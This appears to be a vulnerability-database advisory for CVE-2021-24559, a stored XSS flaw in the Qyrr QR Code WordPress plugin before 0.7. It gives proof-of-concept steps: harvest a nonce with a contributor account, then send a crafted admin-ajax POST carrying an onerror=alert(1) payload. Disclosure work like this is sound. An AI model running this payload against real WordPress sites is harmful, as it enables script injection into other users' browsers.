Authenticating contributor account needed to exploit Stored XSS vulnerability in QR WordPress plugi
Reporter | Title | Published | Views | Family All 5 |
---|---|---|---|---|
CVE | CVE-2021-24559 | 16 Jan 202416:15 | – | cve |
NVD | CVE-2021-24559 | 16 Jan 202416:15 | – | nvd |
WPVulnDB | Qyrr < 0.7 - Authenticated (contributor+) Stored XSS | 26 Jul 202100:00 | – | wpvulndb |
Prion | Cross site scripting | 16 Jan 202416:15 | – | prion |
Cvelist | CVE-2021-24559 Qyrr < 0.7 - Authenticated (contributor+) Stored XSS | 16 Jan 202415:48 | – | cvelist |
To exploit this vulnerability the attacker should have access, at least, to an account with the capability 'edit_posts'. ( Eg. contributor ). This is required to obtain a nonce, which is used to protect the affected ajax function.
To obtain the nonce, the attacker calls: "<your host here>/wp-admin/edit.php?post_type=qr". The nonce now lays in a script with the id "qyrr-admin-js-extra".
Inside the script, the exploitable qr-posts are listed (post_id is the id of post meta data with the meta key 'data-uri' ). There is no check, if the requesting user is the owner of that qr post.
The third required parameter is data-uri. This param will contain the stored javascript. On request-processing data-uri will be sanitized by sanitize_text_field but will not be escaped when output in the src attribute of the QR Code Image
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]
action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22
Then access the page/post where the QR Code is embed to trigger the XSS
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo